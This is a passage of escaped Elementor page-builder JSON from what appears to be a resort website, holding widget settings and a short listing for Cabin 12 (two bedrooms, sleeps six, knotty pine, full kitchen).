"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"